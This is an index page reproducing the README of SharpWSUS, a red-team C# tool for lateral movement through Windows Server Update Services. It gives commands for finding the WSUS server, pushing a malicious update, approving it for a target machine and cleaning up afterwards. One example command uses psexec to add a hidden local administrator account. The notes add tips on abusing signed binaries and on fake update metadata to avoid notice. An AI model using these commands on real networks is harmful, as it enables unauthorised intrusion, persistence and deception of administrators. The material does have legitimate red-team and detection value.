Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nettitude/SharpWSUS
https://github.com/nettitude/SharpWSUS
Last synced: 21 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/nettitude/SharpWSUS
- Owner: nettitude
- Created: 2022-05-04T08:27:57.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-11-20T23:41:40.000Z (about 2 years ago)
- Last Synced: 2024-08-05T17:25:59.860Z (4 months ago)
- Language: C#
- Size: 17.6 KB
- Stars: 429
- Watchers: 8
- Forks: 73
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - nettitude/SharpWSUS - (C# #)
README
# SharpWSUS
SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.
## Credits
Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.
* https://github.com/AlsidOfficial/WSUSpendu - powershell tool for abusing WSUS
* https://github.com/ThunderGunExpress/Thunder_Woosus - Csharp tool for abusing WSUS## Help Menu
```
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red TeamCommands listed below have optional parameters in <>.
Locate the WSUS server:
SharpWSUS.exe locateInspect the WSUS server, enumerating clients, servers and existing groups:
SharpWSUS.exe inspectCreate an update (NOTE: The payload has to be a windows signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload]Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target]Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN]
```## Example Usage
```
sharpwsus locatesharpwsus inspect
sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"
sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"
sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local
sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"
```## Notes
* Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement.
* The metadata on the create command is not needed, but is useful for blending in to the environment.
* If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)